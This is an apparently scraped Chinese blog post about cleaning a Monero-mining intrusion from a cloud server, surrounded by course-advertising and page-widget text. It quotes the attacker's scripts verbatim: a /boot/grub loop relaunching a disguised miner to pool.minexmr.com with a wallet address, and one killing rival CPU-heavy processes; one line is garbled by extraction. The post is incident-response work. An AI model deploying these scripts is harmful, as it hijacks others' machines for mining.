最新阿里云服务器出现入侵事件:挖矿进程——pool,2024年最新成功入职阿里

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

.bash_history:grep -r pool.minexmr.com
.bash_history:ps -e -o ‘pid,comm,args,pcpu,rsz,vsz,stime,user,uid’ | pool.minexmr.com
.bash_history:grep -r pool.minexmr.com


### 3.打开搜索到的位置



vim /boot/grub/deamon


里面是这样的



#!/bin/bash
#daemon
export PATH= P A T H : / b i n : / u s r / b i n : / u s r / l o c a l / b i n : / s b i n : / u s r / s b i n : / u s r / l o c a l / s b i n w h i l e t r u e ; d o s e r v e r = ‘ p s a u x ∣ g r e p ′ p o o l . m i n e x m r . c o m : 5555 − u 4 A U F 3 p a E 7 o p i w m f U K f b C D M Y v U A P a M Z J r e 4 Q Z n P u x B v n E h L 5 C p u V X H 9 t A M e B m Q f S e b Q B H Y U w y c A R c h B 8 C o k k V A A e t D n u p Y s j ′ ∣ g r e p − v g r e p ‘ i f [ ! " PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin while true; do server=`ps aux | grep 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | grep -v grep` if [ ! " PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbinwhiletrue;doserver=psauxgreppool.minexmr.com:5555u4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsjgrepvgrepif[!"server" ]; then
\cp -rf /boot/grub/grub.tz /usr/sbin/bashd
chmod +x /usr/sbin/bashd
cd /usr/sbin
nohup bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj -p x &
fi
sleep 15
done


删掉里面的while循环,只保留



#!/bin/bash
#daemon
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin


全局搜索



grep -r pool.minexmr.com


同样干掉



#!/bin/bash
#disk_genius
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
while true;
do
ps aux --sort=%cpu |grep -v ‘pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj’ | awk ‘{if($3 > 40.0 && $NF ~//) print $2}’ |xargs -i kill -9 {}
sleep 3
done


改成



#!/bin/bash
#disk_geniusi
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin


再次搜索




![img](https://img-blog.csdnimg.cn/img_convert/4a561be6178b81a91bfa1624025a85c6.png)
![img](https://img-blog.csdnimg.cn/img_convert/5d0e539dba857bbd8a07be80b95f5f54.png)
![img](https://img-blog.csdnimg.cn/img_convert/7d6a8e9e3ee9bb4a8d791cbdd1633eee.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

讲解视频,并且后续会持续更新**

**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值